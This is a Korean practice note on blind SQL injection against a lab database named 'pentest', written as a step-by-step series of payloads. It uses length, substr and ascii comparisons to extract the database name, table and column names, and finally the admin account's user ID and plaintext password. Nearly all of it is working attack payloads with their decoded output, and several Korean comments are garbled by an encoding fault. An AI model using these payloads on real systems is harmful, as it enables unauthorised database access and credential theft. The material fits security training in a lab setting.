SQL Injection 실습
1. 에러 및 취약점 진단
# 데이터 베이스의 글자 수 7글자
length((SELECT database()))=7
# 데이터 베이스의 글자 첫 글자가 'a' 인가요? (아래 식은 substr()의 위치·길이 인자가 빠져 있음 — 이후 줄처럼 ,1,1 을 붙여야 첫 글자를 비교함)
substr((SELECT database()))='a'
# ' < 기호를 쓸 수 없을 때 아스키코드 부등호로 사용
ascii(substr((SELECT database()),1,1))>80
ascii(substr((SELECT database()),1,1))=112
ascii(substr((SELECT database()),2,1))=101
ascii(substr((SELECT database()),3,1))=110
ascii(substr((SELECT database()),4,1))=116
ascii(substr((SELECT database()),5,1))=101
ascii(substr((SELECT database()),6,1))=115
ascii(substr((SELECT database()),7,1))=116
테이블 갯수 추출
# pentest 테이블 갯수가 5개 인가요 ? (0x70656E74657374 = 'pentest' 의 16진수 표기)
(SELECT count(*) FROM information_schema.tables WHERE table_schema=0x70656E74657374)=5
첫번째 테이블 글자 수 추출
# 첫번째 테이블의 글자수가 5글자 인가요 ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1))=5
# 두번째 테이블의 글자수가 n글자 인가요 ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 1,1))=n
# 세번째 테이블의 글자수가 6글자 인가요 ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1))=6
# 네번째 테이블의 글자수가 n글자 인가요 ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 3,1))=n
# 다섯번째 테이블의 글자수가 4글자 인가요 ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1))=4
# pentest์ ์ฒซ๋ฒ์งธ ํ
์ด๋ธ์ด๋ฆ์ ์ฒซ ๊ธ์๊ฐ 98์ธ๊ฐ์ ?
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),1,1))=98
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),2,1))=111
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),3,1))=97
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),4,1))=114
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),5,1))=100
# 3 > 6글자 notice
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),1,1))=110
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),2,1))=111
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),3,1))=116
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),4,1))=105
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),5,1))=99
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),6,1))=101
# 4 > n글자
# 5 > 4글자 user
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),1,1))=117
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),2,1))=115
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),3,1))=101
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),4,1))=114
테이블 칼럼의 첫번째 칼럼의 글자 수는?
# pentest 데이터베이스의 user 테이블의 첫번째 칼럼의 이름은 2글자 인가요 ? (0x75736572 = 'user' 의 16진수 표기)
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 0,1))=2
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 1,1))=6
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 2,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 3,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 4,1))=4
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 5,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 6,1))=5
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 7,1))=7
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 8,1))=5
첫번째 칼럼의 첫번째 글자
# pentest์ user์ ์๋ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ : ID
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+0,1),1,1))=73
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+0,1),2,1))=68
# pentest์ user์ ์๋ ๋๋ฒ์งธ ์ปฌ๋ผ : userID
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+1,1),1,1))=117
117 115 101 114 73 68 > userID
# pentest์ user์ ์๋ ์ธ๋ฒ์งธ ์ปฌ๋ผ : password
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+2,1),1,1))=112
112 97 115 115 119 111 114 100 > password
# pentest์ user์ userID์ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ์ ๊ธ์์๋ 5๊ธ์
length((SELECT userID FROM pentest.user LIMIT 0,1))=5
# pentest์ user์ userID์ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ์ ์ฒซ ๊ธ์ = 97
ascii(substr((SELECT userID FROM pentest.user LIMIT 0,1),1,1))=97
# 97 100 109 105 110 > admin
# pentest์ user์ password์ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ์ ๊ธ์์๋ 11๊ธ์
length((SELECT password FROM pentest.user LIMIT 0,1))=11
# 97 100 109 105 110 > admin
# pentest์ user์ password์ ์ฒซ๋ฒ์งธ ์ปฌ๋ผ์ ์ฒซ ๊ธ์ = 49
ascii(substr((SELECT password FROM pentest.user LIMIT 0,1),1,1))=49
# 49 113 50 119 51 101 52 114 53 116 33 > 1q2w3e4r5t!